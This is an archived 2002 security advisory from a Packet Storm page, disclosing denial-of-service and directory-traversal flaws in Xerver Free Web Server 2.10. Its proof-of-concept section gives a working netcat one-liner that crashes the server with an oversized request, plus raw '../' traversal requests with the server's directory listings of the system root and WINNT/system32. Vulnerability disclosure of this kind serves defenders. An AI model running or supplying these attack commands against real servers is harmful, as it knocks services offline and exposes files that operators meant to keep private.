what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Xerver-2.10.txt

Xerver-2.10.txt
Posted Mar 8, 2002
Authored by Alex Hernandez

The Xerver Free Web Server v2.10 contains file disclosure and denial of service vulnerabilities. Platforms affected include Windows, Linux, BSD, Solaris, and Mac. Exploits included.

tags | exploit, web, denial of service, vulnerability
systems | linux, windows, solaris, bsd
SHA-256 | 38182b4e729c84958d0fc82d0597349a14e9eea6c1efb3b69df525ff368496eb

Xerver-2.10.txt

Change Mirror Download

------oOo------
Xerver Free Web Server 2.10 file Disclosure & DoS (Denial of Service Attack).
------oOo------

Company Affected: www.JavaScript.nu
Version: v2.10
Date Added: 02-27-02
Size: 287 KB
OS Affected: : Windows ALL, Linux ALL, BSD all, Solaris ALL, MAC ALL.

Author:

** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

Also a greet to "KF" <dotslash@snosoft.com>
http://www.snosoft.com for invitme to participate for more
research about the Bugs, Exploits and Vulnerabilities :-)
thanks friend, u have publish exelents bugs :X

----=[Brief Description]=------------


Xerver Free Web Server is a tiny web server allowing you to run CGI/perl scripts on
your computer. Xerver includes features such as: Allow/forbid directory listing,
create your own error pages ("404 File Not Found"), allow/deny CGI-scripts, choose
your own index file extensions, share/unshare hidden files or files with certain
file extensions, share unlimited folders etc. Xerver is a tiny, fast and free web
server, but is still advanced and supports both HTTP/1.1 and HTTP/1.0 and all HTTP
methods (GET, POST and HEAD)."Run CGI/perl scripts on your computer.


----=[Summary]=----------------------

Exist two vulnerabilities:


The port 32123 usually is configuration of the server , exist a one metod for crass this
system calling the drive C:\ several times, another bug exists on server remote any
user can see all the files configuration on the system also even though one has formed
the services to deny the folders or files any user can access via remote to 80 port
finding the configuration of the own server.


------oOo------
Proof of concept


DoS

http://localhost:32123

$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1 32123


Explotation:

Example 1:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html

<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY BGCOLOR=white COL
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for /</H2></F
ONT><PRE>&nbsp;&nbsp;&nbsp;&nbsp;<B>File name File size&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;Last modified</B>


Program Files
--------------------------------------------------------------------------------
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG SRC="/Image:showFold
er" BORDER=0> Program Files</A>
--------------------------------------------------------------------------------

RECYCLER
--------------------------------------------------------------------------------
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" B
ORDER=0> RECYCLER</A>
--------------------------------------------------------------------------------

WINNT
--------------------------------------------------------------------------------
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORD
ER=0> WINNT</A>
-------------------------------------------------------------------------------

[...]

or via web:



http://localhost/unix/ALEX/Xerver2.10/../../../

Directory Listing for /

File name File size Last modified

$unix
ALEX
Documents and Settings
My Downloads
Program Files
RECYCLER

[...]


Example 2:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0

The results is:

Directory Listing for /WINNT/system32/


File name File size Last modified
../
AdCache
CatRoot
Com
DTCLog
DirectX
GroupPolicy
Hummbird
IOSUBSYS
Macromed
Microsoft

[...]


------oOo------------------------------------
Vendor Response:
The vendor was notified
"Omid Rouhani" webmaster@javascript.nu
htttp://www.JavaScript.nu
Patch Temporary: Restricted files and Directories

Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.

------oOo------------------------------------








Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close